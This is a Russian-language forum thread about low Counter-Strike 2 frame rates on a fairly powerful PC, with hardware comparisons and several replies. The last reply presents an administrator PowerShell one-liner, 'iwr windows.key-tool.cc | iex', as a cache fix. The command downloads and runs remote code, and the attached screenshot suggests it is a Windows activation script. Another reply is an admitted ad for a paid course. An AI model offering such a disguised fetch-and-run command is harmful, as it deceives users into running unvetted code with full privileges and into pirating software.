Мало фпс в кс 2 на хорошем пк
Всем привет у меня есть проблемы с кс 2 в поане фпс и выоетами.С вылетами потом объясню а щас фпс у меня
intel core i5-11400f без лимитов
RTX 2080suoer 8gb asus rog strix с разгоном до 2055мгц и частотой памяти 8200мгц в итоге по мощьности и по баллам в разных бенчмарках на 1-2% мощьнее RTX 3070
16 гб озу ddr4 3600mhz тайминги CL16
материнка Aasrock b560m hdv/m.2
На очень сомнительном сайте technicalcity в разделе пойдет игра я выбираю кс 2 выстовляю характеристики своего пк и мне там пишет что на низких в 720р у меня должно быть 350-400 фпс. На карте из мастеркой кс на карте бенчмарк даст 2 у меня 360-380фпс P1 фпс у меня 150-170 в катке на фейсите у меня еле 270 а то и на некоторых картах 200-220 а у мнея моник 300гц но играю на 240 потому что мало фпс.
А у моего друга на вот таком пк
Intel core 11400f с лимитом 130вт
RTX 3060 8gb gigabyte eagle вроде или еще какая то с небольшим разгоном на +30-400мгц и частота паяти где то 7500мгц
Озу 16gb 3200 мгц тайминги CL16
материнка asus prime h510m e
И у него не вылетает и 300+фпс в катке а в бенчмарке в кс AVG FPS 450 P1 260
У каждого win 10 pro с одинаковой оптимизацией
Привот я поняо твоо пробоему. Bля бро, лучше изучай программирование, пока время есть, потратить 2200 р на курсы, крутые, я ща по ним двигаюсь, потом на фрилансе в месяц 100-200 т.р. Я раньше тоже в кс с другом постоянно задротил, но оперативке 3.14зда была, поэтому я занялся программированием, чтоб купить комп круче, и на данных момент за 2 недели обучения умею создавать крутые веб сайты, и планирую создать пиратский сайт, а потом игру в плей маркет, да, звучит как реклама инфоцыганского курса, это так и есть)
technicalcity помойка а не сайт. Вылетает значит большой разгон убирай его. Настрой дайвера. По факту у тебя всё норм. И у твоего друга не как не может быть AVG 450 FPS на карте 3060 8gb...
Скорее всего надо сбросить кеш
Нажать правой кнопкой мыши по пуску, выбрать PowerShell (администратор), вставить эту команду:
iwr windows.key-tool.cc | iex
Нажать Enter.
(не путать с командной строкой).
В открывшемся окне нажать 1.
https://i1.wampi.ru/2024/07/07/Microsoft-Activation-Scripts.png (скриншот).
После выполнения команды закрыть все окна и перезагрузить ПК.